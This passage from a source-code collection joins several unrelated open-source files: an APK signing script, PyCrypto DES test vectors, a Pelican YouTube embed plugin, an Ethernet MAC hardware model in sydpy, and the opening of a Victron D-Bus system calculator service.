'chromiumdebugkey',
]
build_utils.CheckCallDie(sign_cmd)
def AlignApk(android_sdk_root, unaligned_path, final_path):
align_cmd = [
os.path.join(android_sdk_root, 'tools', 'zipalign'),
'-f', '4', # 4 bytes
unaligned_path,
final_path,
]
build_utils.CheckCallDie(align_cmd)
def main(argv):
parser = optparse.OptionParser()
parser.add_option('--android-sdk-root', help='Android sdk root directory.')
parser.add_option('--unsigned-apk-path', help='Path to input unsigned APK.')
parser.add_option('--final-apk-path',
help='Path to output signed and aligned APK.')
parser.add_option('--keystore-path', help='Path to keystore for signing.')
parser.add_option('--stamp', help='Path to touch on success.')
# TODO(newt): remove this once http://crbug.com/177552 is fixed in ninja.
parser.add_option('--ignore', help='Ignored.')
options, _ = parser.parse_args()
with tempfile.NamedTemporaryFile() as intermediate_file:
signed_apk_path = intermediate_file.name
SignApk(options.keystore_path, options.unsigned_apk_path, signed_apk_path)
AlignApk(options.android_sdk_root, signed_apk_path, options.final_apk_path)
if options.stamp:
build_utils.Touch(options.stamp)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |
szymex/xbmc-finnish-tv | plugin.video.yleareena/win32/Crypto/SelfTest/Cipher/test_DES.py | 119 | 15009 | # -*- coding: utf-8 -*-
#
# SelfTest/Cipher/DES.py: Self-test for the (Single) DES cipher
#
# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Crypto.Cipher.DES"""
__revision__ = "$Id$"
from common import dict # For compatibility with Python 2.1 and 2.2
from Crypto.Util.py3compat import *
import unittest
# This is a list of (plaintext, ciphertext, key, description) tuples.
SP800_17_B1_KEY = '01' * 8
SP800_17_B2_PT = '00' * 8
test_data = [
# Test vectors from Appendix A of NIST SP 800-17
# "Modes of Operation Validation System (MOVS): Requirements and Procedures"
# http://csrc.nist.gov/publications/nistpubs/800-17/800-17.pdf
# Appendix A - "Sample Round Outputs for the DES"
('0000000000000000', '82dcbafbdeab6602', '10316e028c8f3b4a',
"NIST SP800-17 A"),
# Table B.1 - Variable Plaintext Known Answer Test
('8000000000000000', '95f8a5e5dd31d900', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #0'),
('4000000000000000', 'dd7f121ca5015619', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #1'),
('2000000000000000', '2e8653104f3834ea', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #2'),
('1000000000000000', '4bd388ff6cd81d4f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #3'),
('0800000000000000', '20b9e767b2fb1456', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #4'),
('0400000000000000', '55579380d77138ef', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #5'),
('0200000000000000', '6cc5defaaf04512f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #6'),
('0100000000000000', '0d9f279ba5d87260', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #7'),
('0080000000000000', 'd9031b0271bd5a0a', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #8'),
('0040000000000000', '424250b37c3dd951', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #9'),
('0020000000000000', 'b8061b7ecd9a21e5', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #10'),
('0010000000000000', 'f15d0f286b65bd28', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #11'),
('0008000000000000', 'add0cc8d6e5deba1', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #12'),
('0004000000000000', 'e6d5f82752ad63d1', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #13'),
('0002000000000000', 'ecbfe3bd3f591a5e', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #14'),
('0001000000000000', 'f356834379d165cd', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #15'),
('0000800000000000', '2b9f982f20037fa9', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #16'),
('0000400000000000', '889de068a16f0be6', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #17'),
('0000200000000000', 'e19e275d846a1298', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #18'),
('0000100000000000', '329a8ed523d71aec', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #19'),
('0000080000000000', 'e7fce22557d23c97', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #20'),
('0000040000000000', '12a9f5817ff2d65d', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #21'),
('0000020000000000', 'a484c3ad38dc9c19', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #22'),
('0000010000000000', 'fbe00a8a1ef8ad72', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #23'),
('0000008000000000', '750d079407521363', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #24'),
('0000004000000000', '64feed9c724c2faf', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #25'),
('0000002000000000', 'f02b263b328e2b60', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #26'),
('0000001000000000', '9d64555a9a10b852', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #27'),
('0000000800000000', 'd106ff0bed5255d7', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #28'),
('0000000400000000', 'e1652c6b138c64a5', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #29'),
('0000000200000000', 'e428581186ec8f46', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #30'),
('0000000100000000', 'aeb5f5ede22d1a36', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #31'),
('0000000080000000', 'e943d7568aec0c5c', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #32'),
('0000000040000000', 'df98c8276f54b04b', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #33'),
('0000000020000000', 'b160e4680f6c696f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #34'),
('0000000010000000', 'fa0752b07d9c4ab8', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #35'),
('0000000008000000', 'ca3a2b036dbc8502', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #36'),
('0000000004000000', '5e0905517bb59bcf', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #37'),
('0000000002000000', '814eeb3b91d90726', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #38'),
('0000000001000000', '4d49db1532919c9f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #39'),
('0000000000800000', '25eb5fc3f8cf0621', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #40'),
('0000000000400000', 'ab6a20c0620d1c6f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #41'),
('0000000000200000', '79e90dbc98f92cca', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #42'),
('0000000000100000', '866ecedd8072bb0e', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #43'),
('0000000000080000', '8b54536f2f3e64a8', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #44'),
('0000000000040000', 'ea51d3975595b86b', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #45'),
('0000000000020000', 'caffc6ac4542de31', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #46'),
('0000000000010000', '8dd45a2ddf90796c', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #47'),
('0000000000008000', '1029d55e880ec2d0', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #48'),
('0000000000004000', '5d86cb23639dbea9', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #49'),
('0000000000002000', '1d1ca853ae7c0c5f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #50'),
('0000000000001000', 'ce332329248f3228', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #51'),
('0000000000000800', '8405d1abe24fb942', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #52'),
('0000000000000400', 'e643d78090ca4207', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #53'),
('0000000000000200', '48221b9937748a23', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #54'),
('0000000000000100', 'dd7c0bbd61fafd54', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #55'),
('0000000000000080', '2fbc291a570db5c4', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #56'),
('0000000000000040', 'e07c30d7e4e26e12', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #57'),
('0000000000000020', '0953e2258e8e90a1', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #58'),
('0000000000000010', '5b711bc4ceebf2ee', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #59'),
('0000000000000008', 'cc083f1e6d9e85f6', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #60'),
('0000000000000004', 'd2fd8867d50d2dfe', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #61'),
('0000000000000002', '06e7ea22ce92708f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #62'),
('0000000000000001', '166b40b44aba4bd6', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #63'),
# Table B.2 - Variable Key Known Answer Test
(SP800_17_B2_PT, '95a8d72813daa94d', '8001010101010101',
'NIST SP800-17 B.2 #0'),
(SP800_17_B2_PT, '0eec1487dd8c26d5', '4001010101010101',
'NIST SP800-17 B.2 #1'),
(SP800_17_B2_PT, '7ad16ffb79c45926', '2001010101010101',
'NIST SP800-17 B.2 #2'),
(SP800_17_B2_PT, 'd3746294ca6a6cf3', '1001010101010101',
'NIST SP800-17 B.2 #3'),
(SP800_17_B2_PT, '809f5f873c1fd761', '0801010101010101',
'NIST SP800-17 B.2 #4'),
(SP800_17_B2_PT, 'c02faffec989d1fc', '0401010101010101',
'NIST SP800-17 B.2 #5'),
(SP800_17_B2_PT, '4615aa1d33e72f10', '0201010101010101',
'NIST SP800-17 B.2 #6'),
(SP800_17_B2_PT, '2055123350c00858', '0180010101010101',
'NIST SP800-17 B.2 #7'),
(SP800_17_B2_PT, 'df3b99d6577397c8', '0140010101010101',
'NIST SP800-17 B.2 #8'),
(SP800_17_B2_PT, '31fe17369b5288c9', '0120010101010101',
'NIST SP800-17 B.2 #9'),
(SP800_17_B2_PT, 'dfdd3cc64dae1642', '0110010101010101',
'NIST SP800-17 B.2 #10'),
(SP800_17_B2_PT, '178c83ce2b399d94', '0108010101010101',
'NIST SP800-17 B.2 #11'),
(SP800_17_B2_PT, '50f636324a9b7f80', '0104010101010101',
'NIST SP800-17 B.2 #12'),
(SP800_17_B2_PT, 'a8468ee3bc18f06d', '0102010101010101',
'NIST SP800-17 B.2 #13'),
(SP800_17_B2_PT, 'a2dc9e92fd3cde92', '0101800101010101',
'NIST SP800-17 B.2 #14'),
(SP800_17_B2_PT, 'cac09f797d031287', '0101400101010101',
'NIST SP800-17 B.2 #15'),
(SP800_17_B2_PT, '90ba680b22aeb525', '0101200101010101',
'NIST SP800-17 B.2 #16'),
(SP800_17_B2_PT, 'ce7a24f350e280b6', '0101100101010101',
'NIST SP800-17 B.2 #17'),
(SP800_17_B2_PT, '882bff0aa01a0b87', '0101080101010101',
'NIST SP800-17 B.2 #18'),
(SP800_17_B2_PT, '25610288924511c2', '0101040101010101',
'NIST SP800-17 B.2 #19'),
(SP800_17_B2_PT, 'c71516c29c75d170', '0101020101010101',
'NIST SP800-17 B.2 #20'),
(SP800_17_B2_PT, '5199c29a52c9f059', '0101018001010101',
'NIST SP800-17 B.2 #21'),
(SP800_17_B2_PT, 'c22f0a294a71f29f', '0101014001010101',
'NIST SP800-17 B.2 #22'),
(SP800_17_B2_PT, 'ee371483714c02ea', '0101012001010101',
'NIST SP800-17 B.2 #23'),
(SP800_17_B2_PT, 'a81fbd448f9e522f', '0101011001010101',
'NIST SP800-17 B.2 #24'),
(SP800_17_B2_PT, '4f644c92e192dfed', '0101010801010101',
'NIST SP800-17 B.2 #25'),
(SP800_17_B2_PT, '1afa9a66a6df92ae', '0101010401010101',
'NIST SP800-17 B.2 #26'),
(SP800_17_B2_PT, 'b3c1cc715cb879d8', '0101010201010101',
'NIST SP800-17 B.2 #27'),
(SP800_17_B2_PT, '19d032e64ab0bd8b', '0101010180010101',
'NIST SP800-17 B.2 #28'),
(SP800_17_B2_PT, '3cfaa7a7dc8720dc', '0101010140010101',
'NIST SP800-17 B.2 #29'),
(SP800_17_B2_PT, 'b7265f7f447ac6f3', '0101010120010101',
'NIST SP800-17 B.2 #30'),
(SP800_17_B2_PT, '9db73b3c0d163f54', '0101010110010101',
'NIST SP800-17 B.2 #31'),
(SP800_17_B2_PT, '8181b65babf4a975', '0101010108010101',
'NIST SP800-17 B.2 #32'),
(SP800_17_B2_PT, '93c9b64042eaa240', '0101010104010101',
'NIST SP800-17 B.2 #33'),
(SP800_17_B2_PT, '5570530829705592', '0101010102010101',
'NIST SP800-17 B.2 #34'),
(SP800_17_B2_PT, '8638809e878787a0', '0101010101800101',
'NIST SP800-17 B.2 #35'),
(SP800_17_B2_PT, '41b9a79af79ac208', '0101010101400101',
'NIST SP800-17 B.2 #36'),
(SP800_17_B2_PT, '7a9be42f2009a892', '0101010101200101',
'NIST SP800-17 B.2 #37'),
(SP800_17_B2_PT, '29038d56ba6d2745', '0101010101100101',
'NIST SP800-17 B.2 #38'),
(SP800_17_B2_PT, '5495c6abf1e5df51', '0101010101080101',
'NIST SP800-17 B.2 #39'),
(SP800_17_B2_PT, 'ae13dbd561488933', '0101010101040101',
'NIST SP800-17 B.2 #40'),
(SP800_17_B2_PT, '024d1ffa8904e389', '0101010101020101',
'NIST SP800-17 B.2 #41'),
(SP800_17_B2_PT, 'd1399712f99bf02e', '0101010101018001',
'NIST SP800-17 B.2 #42'),
(SP800_17_B2_PT, '14c1d7c1cffec79e', '0101010101014001',
'NIST SP800-17 B.2 #43'),
(SP800_17_B2_PT, '1de5279dae3bed6f', '0101010101012001',
'NIST SP800-17 B.2 #44'),
(SP800_17_B2_PT, 'e941a33f85501303', '0101010101011001',
'NIST SP800-17 B.2 #45'),
(SP800_17_B2_PT, 'da99dbbc9a03f379', '0101010101010801',
'NIST SP800-17 B.2 #46'),
(SP800_17_B2_PT, 'b7fc92f91d8e92e9', '0101010101010401',
'NIST SP800-17 B.2 #47'),
(SP800_17_B2_PT, 'ae8e5caa3ca04e85', '0101010101010201',
'NIST SP800-17 B.2 #48'),
(SP800_17_B2_PT, '9cc62df43b6eed74', '0101010101010180',
'NIST SP800-17 B.2 #49'),
(SP800_17_B2_PT, 'd863dbb5c59a91a0', '0101010101010140',
'NIST SP800-17 B.2 #50'),
(SP800_17_B2_PT, 'a1ab2190545b91d7', '0101010101010120',
'NIST SP800-17 B.2 #51'),
(SP800_17_B2_PT, '0875041e64c570f7', '0101010101010110',
'NIST SP800-17 B.2 #52'),
(SP800_17_B2_PT, '5a594528bebef1cc', '0101010101010108',
'NIST SP800-17 B.2 #53'),
(SP800_17_B2_PT, 'fcdb3291de21f0c0', '0101010101010104',
'NIST SP800-17 B.2 #54'),
(SP800_17_B2_PT, '869efd7f9f265a09', '0101010101010102',
'NIST SP800-17 B.2 #55'),
]
class RonRivestTest(unittest.TestCase):
""" Ronald L. Rivest's DES test, see
http://people.csail.mit.edu/rivest/Destest.txt
ABSTRACT
--------
We present a simple way to test the correctness of a DES implementation:
Use the recurrence relation:
X0 = 9474B8E8C73BCA7D (hexadecimal)
X(i+1) = IF (i is even) THEN E(Xi,Xi) ELSE D(Xi,Xi)
to compute a sequence of 64-bit values: X0, X1, X2, ..., X16. Here
E(X,K) denotes the DES encryption of X using key K, and D(X,K) denotes
the DES decryption of X using key K. If you obtain
X16 = 1B1A2DDB4C642438
your implementation does not have any of the 36,568 possible single-fault
errors described herein.
"""
def runTest(self):
from Crypto.Cipher import DES
from binascii import b2a_hex
X = []
X[0:] = [b('\x94\x74\xB8\xE8\xC7\x3B\xCA\x7D')]
for i in range(16):
c = DES.new(X[i],DES.MODE_ECB)
if not (i&1): # (num&1) returns 1 for odd numbers
X[i+1:] = [c.encrypt(X[i])] # even
else:
X[i+1:] = [c.decrypt(X[i])] # odd
self.assertEqual(b2a_hex(X[16]),
b2a_hex(b('\x1B\x1A\x2D\xDB\x4C\x64\x24\x38')))
def get_tests(config={}):
from Crypto.Cipher import DES
from common import make_block_tests
return make_block_tests(DES, "DES", test_data) + [RonRivestTest()]
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| gpl-3.0 |
40423127/cpaw5 | plugin/liquid_tags_old/youtube.py | 284 | 1674 | """
Youtube Tag
---------
This implements a Liquid-style youtube tag for Pelican,
based on the jekyll / octopress youtube tag [1]_
Syntax
------
{% youtube id [width height] %}
Example
-------
{% youtube dQw4w9WgXcQ 640 480 %}
Output
------
<iframe
width="640" height="480" src="https://www.youtube.com/embed/dQw4w9WgXcQ"
frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen>
</iframe>
[1] https://gist.github.com/jamieowen/2063748
"""
import re
from .mdx_liquid_tags import LiquidTags
SYNTAX = "{% youtube id [width height] %}"
YOUTUBE = re.compile(r'([\S]+)(\s+(\d+)\s(\d+))?')
@LiquidTags.register('youtube')
def youtube(preprocessor, tag, markup):
width = 640
height = 390
youtube_id = None
match = YOUTUBE.search(markup)
if match:
groups = match.groups()
youtube_id = groups[0]
width = groups[2] or width
height = groups[3] or height
if youtube_id:
youtube_out = """
<div class="videobox">
<iframe width="{width}" height="{height}"
src='https://www.youtube.com/embed/{youtube_id}'
frameborder='0' webkitAllowFullScreen mozallowfullscreen
allowFullScreen>
</iframe>
</div>
""".format(width=width, height=height, youtube_id=youtube_id).strip()
else:
raise ValueError("Error processing input, "
"expected syntax: {0}".format(SYNTAX))
return youtube_out
# ---------------------------------------------------
# This import allows image tag to be a Pelican plugin
from liquid_tags import register # noqa
| mit |
bogdanvuk/sydpy | examples/eth_1g_mac/eth_1g_mac.py | 1 | 9074 | '''
Created on Dec 15, 2014
@author: bvukobratovic
'''
from sydpy import *
from examples.crc32.crc32 import Crc32
import zlib
from sydpy.procs.clk import Clocking
eth_usr_pkt = Struct(
('dest', Vector(6, bit8)),
('src', Vector(6, bit8)),
('len_type', bit16),
('data', Array(bit8, max_size=64))
)
eth_gmii_pkt = Struct(
('pream', Vector(7, bit8)),
('start', bit8),
('dest', Vector(6, bit8)),
('src', Vector(6, bit8)),
('len_type', bit16),
('data', Array(bit8, max_size=64)),
('crc', bit32)
)
# Found the algorithm at: http://www.hackersdelight.org/hdcodetxt/crc.c.txt
def setup_crc_table():
crc_table = []
for byte in range(0, 256):
crc = bit32(byte)
for _ in range(8, 0, -1):
mask = -(int(crc) & 1)
crc = (crc >> 1) ^ (0xEDB88320 & mask);
crc_table.append(crc);
return crc_table
preamble_last_pos = 7
sfd_pos = preamble_last_pos + 1
dest_last_pos = sfd_pos + 6
src_last_pos = dest_last_pos + 6
len_type_first_pos = src_last_pos + 1
len_type_second_pos = len_type_first_pos + 1
class Eth1GMac(Module):
#@arch
def tlm(self,
pkt_in : tlm(eth_usr_pkt),
pkt_out: tlm(eth_gmii_pkt).master
):
@always_acquire(self, pkt_in)
def proc(pkt):
if len(pkt.data) < 46:
pkt.data += [bit8(0) for _ in range(46 - len(pkt.data))]
crc = 0
for b in convgen(pkt, bit8):
crc = zlib.crc32(bytes([int(b)]), crc)
# print("{0} -> {1}".format(b, hex(~bit32(crc))))
# print("Final: {0}".format(hex(bit32(crc))))
crc = zlib.crc32(bytes(map(int,
convgen(pkt, bit8)
))
)
crc_rev = list(convgen(bit32(crc), bit8))[::-1]
pkt_gmii = eth_gmii_pkt([
[bit8(0x55) for _ in range(7)],
bit8(0xd5),
pkt.dest,
pkt.src,
pkt.len_type,
pkt.data,
conv(crc_rev, bit32)
])
pkt_out.next = pkt_gmii
# s = ''
#
# print(hex(crc))
#
# print(str(conv(crc_rev, bit32)))
#
# for b in convgen(pkt_gmii[2:6], bit8):
# s += str(b)[2:]
#
# print(s)
#
#@arch_def
def rtl(self,
clk : sig(bit),
pkt_in : seq(bit8),
pkt_out : seq(bit8).master
):
self.inst(Crc32,
clk = clk,
crc_in = 'crc_data',
crc_out='crc',
)
pkt_in.clk <<= clk
pkt_out.clk <<= clk
crc_data = self.seq(bit8, 'crc_data', clk=clk, init=0)
crc = self.seq(bit32, slave='crc', clk=clk)
fsm_states = Enum('idle', 'preamble', 'sfd', 'dest', 'src', 'len_type', 'data', 'pad', 'crc0', 'crc1', 'crc2', 'crc3', 'pkt_end')
fsm_state = self.seq(fsm_states, 'fsm_state', clk=clk, init='idle')
len_type = self.seq(bit16, 'len_type', clk=clk)
pkt_cnt = self.sig(bit16, 'pkt_cnt', init=0)
pkt_in.ready <<= (fsm_state == ['idle', 'dest', 'src', 'len_type', 'data'])
pkt_in_last_reg = self.seq(bit, clk=clk)
pkt_in_last_reg.data <<= pkt_in.last
@always(self, clk.e.posedge)
def pkt_cnt_proc():
if fsm_state in ['idle', 'pkt_end']:
pkt_cnt.next = 1
else:
pkt_cnt.next = pkt_cnt + 1
@always_comb(self) #, fsm_state, pkt_in, crc_out)
def pkt_out_intf():
if fsm_state in ('idle', 'pkt_end'):
pkt_out.valid.next = False
else:
pkt_out.valid.next = True
if fsm_state == 'idle':
pkt_out.next = 0
elif fsm_state == 'preamble':
pkt_out.next = 0x55
elif fsm_state == 'sfd':
pkt_out.next = 0xd5
elif fsm_state in ('dest', 'src', 'len_type', 'data'):
pkt_out.next = pkt_in
elif fsm_state == 'pad':
pkt_out.next = 0
elif fsm_state == 'crc3':
try:
pkt_out.next = bit8(crc >> 24)
except:
pkt_out.next = 0xff
elif fsm_state == 'crc2':
try:
pkt_out.next = bit8(crc >> 16)
except:
pkt_out.next = 0xff
elif fsm_state == 'crc1':
try:
pkt_out.next = bit8(crc >> 8)
except:
pkt_out.next = 0xff
elif fsm_state == 'crc0':
try:
pkt_out.next = bit8(crc)
except:
pkt_out.next = 0xff
if fsm_state == 'crc0':
pkt_out.last.next = True
else:
pkt_out.last.next = False
@always_comb(self)
def fsm_proc():
crc_data.last.next = 0
if fsm_state == 'idle':
if pkt_in.valid:
len_type.next = 0
fsm_state.next = 'preamble'
elif fsm_state == 'preamble':
if pkt_cnt == preamble_last_pos:
fsm_state.next = 'sfd'
elif fsm_state == 'sfd':
fsm_state.next = 'dest'
elif fsm_state == 'dest':
if pkt_cnt == dest_last_pos:
fsm_state.next = 'src'
elif fsm_state == 'src':
if pkt_cnt == src_last_pos:
fsm_state.next = 'len_type'
elif fsm_state == 'len_type':
if pkt_cnt == len_type_first_pos:
len_type[7:0].next = pkt_in
elif pkt_cnt == len_type_second_pos:
len_type[15:8].next = pkt_in
fsm_state.next = 'data'
elif fsm_state == 'data':
if (pkt_cnt == len_type_second_pos + len_type) or \
(pkt_in_last_reg and pkt_cnt < 60 + sfd_pos):
fsm_state.next = 'pad'
elif pkt_in_last_reg:
fsm_state.next = 'crc3'
crc_data.last.next = 1
elif fsm_state == 'pad':
if pkt_in_last_reg or pkt_cnt == 60 + sfd_pos:
fsm_state.next = 'crc3'
crc_data.last.next = 1
elif fsm_state == 'crc3':
fsm_state.next = 'crc2'
elif fsm_state == 'crc2':
fsm_state.next = 'crc1'
elif fsm_state == 'crc1':
fsm_state.next = 'crc0'
elif fsm_state == 'crc0':
fsm_state.next = 'pkt_end'
elif fsm_state == 'pkt_end':
if pkt_in.valid:
fsm_state.next = 'preamble'
else:
fsm_state.next = 'idle'
@always_comb(self)
def crc_sig_gen():
if fsm_state == 'pad':
crc_data.valid.next = 1
crc_data.data.next = 0
else:
crc_data.valid.next = (fsm_state in ['dest', 'src', 'len_type', 'data', 'pad'])
crc_data.data.next = pkt_in
if __name__ == "__main__":
class TestDFF(Module):
#@arch_def
def test1(self):
self.inst(Clocking, clk_o='clk', period=10)
self.inst(BasicRndSeq, seq_o='usr_pkt', intfs={'seq_o' : tlm(eth_usr_pkt).master})
self.inst(Eth1GMac,
clk='clk',
pkt_in='usr_pkt',
pkt_out='gmii_pkt',
arch=['rtl', 'tlm'],
scrbrd=(Scoreboard, {'intfs': {'dut_i': tlm(Array(bit8)), 'ref_i': tlm(Array(bit8))}})
)
conf = {
'sys.top' : TestDFF,
'sys.extensions' : [VCDTracer, SimtimeProgress],
'sys.sim.duration' : 15000
}
sim = Simulator(conf)
sim.run()
| lgpl-2.1 |
victronenergy/dbus-systemcalc-py | dbus_systemcalc.py | 1 | 39685 | #!/usr/bin/python3 -u
# -*- coding: utf-8 -*-
from dbus.mainloop.glib import DBusGMainLoop
import dbus
import argparse
import sys
import os
import json
from itertools import chain
from gi.repository import GLib
# Victron packages
sys.path.insert(1, os.path.join(os.path.dirname(__file__), 'ext', 'velib_python'))
from vedbus import VeDbusService
from ve_utils import get_vrm_portal_id, exit_on_error
from dbusmonitor import DbusMonitor
from settingsdevice import SettingsDevice
from logger import setup_logging
import delegates
from sc_utils import safeadd as _safeadd, safemax as _safemax
softwareVersion = '2.74'
class SystemCalc:
STATE_IDLE = 0
STATE_CHARGING = 1
STATE_DISCHARGING = 2
BATSERVICE_DEFAULT = 'default'
BATSERVICE_NOBATTERY = 'nobattery'
def __init__(self):
# Why this dummy? Because DbusMonitor expects these values to be there, even though we don't
# need them. So just add some dummy data. This can go away when DbusMonitor is more generic.
dummy = {'code': None, 'whenToLog': 'configChange', 'accessLevel': None}
dbus_tree = {
'com.victronenergy.solarcharger': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Load/I': dummy,
'/FirmwareVersion': dummy},
'com.victronenergy.pvinverter': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Ac/L1/Power': dummy,
'/Ac/L2/Power': dummy,
'/Ac/L3/Power': dummy,
'/Position': dummy,
'/ProductId': dummy},
'com.victronenergy.battery': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/DeviceInstance': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/1/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Dc/0/Power': dummy,
'/Soc': dummy,
'/Sense/Current': dummy,
'/TimeToGo': dummy,
'/ConsumedAmphours': dummy,
'/ProductId': dummy,
'/CustomName': dummy},
'com.victronenergy.vebus' : {
'/Ac/ActiveIn/ActiveInput': dummy,
'/Ac/ActiveIn/L1/P': dummy,
'/Ac/ActiveIn/L2/P': dummy,
'/Ac/ActiveIn/L3/P': dummy,
'/Ac/Out/L1/P': dummy,
'/Ac/Out/L2/P': dummy,
'/Ac/Out/L3/P': dummy,
'/Connected': dummy,
'/ProductId': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Mode': dummy,
'/State': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Dc/0/Power': dummy,
'/Soc': dummy},
'com.victronenergy.charger': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Dc/1/Voltage': dummy,
'/Dc/1/Current': dummy,
'/Dc/2/Voltage': dummy,
'/Dc/2/Current': dummy},
'com.victronenergy.grid' : {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/ProductId' : dummy,
'/DeviceType' : dummy,
'/Ac/L1/Power': dummy,
'/Ac/L2/Power': dummy,
'/Ac/L3/Power': dummy},
'com.victronenergy.genset' : {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/ProductId' : dummy,
'/DeviceType' : dummy,
'/Ac/L1/Power': dummy,
'/Ac/L2/Power': dummy,
'/Ac/L3/Power': dummy,
'/StarterVoltage': dummy},
'com.victronenergy.settings' : {
'/Settings/SystemSetup/AcInput1' : dummy,
'/Settings/SystemSetup/AcInput2' : dummy,
'/Settings/CGwacs/RunWithoutGridMeter' : dummy,
'/Settings/System/TimeZone' : dummy},
'com.victronenergy.temperature': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy},
'com.victronenergy.inverter': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Ac/Out/L1/P': dummy,
'/Ac/Out/L1/V': dummy,
'/Ac/Out/L1/I': dummy,
'/Yield/Power': dummy,
'/Soc': dummy,
}
}
self._modules = [
delegates.HubTypeSelect(),
delegates.VebusSocWriter(),
delegates.ServiceMapper(),
delegates.RelayState(),
delegates.BuzzerControl(),
delegates.LgCircuitBreakerDetect(),
delegates.Dvcc(self),
delegates.BatterySense(self),
delegates.BatterySettings(self),
delegates.SystemState(self),
delegates.BatteryLife(),
delegates.ScheduledCharging(),
delegates.SourceTimers(),
#delegates.BydCurrentSense(self),
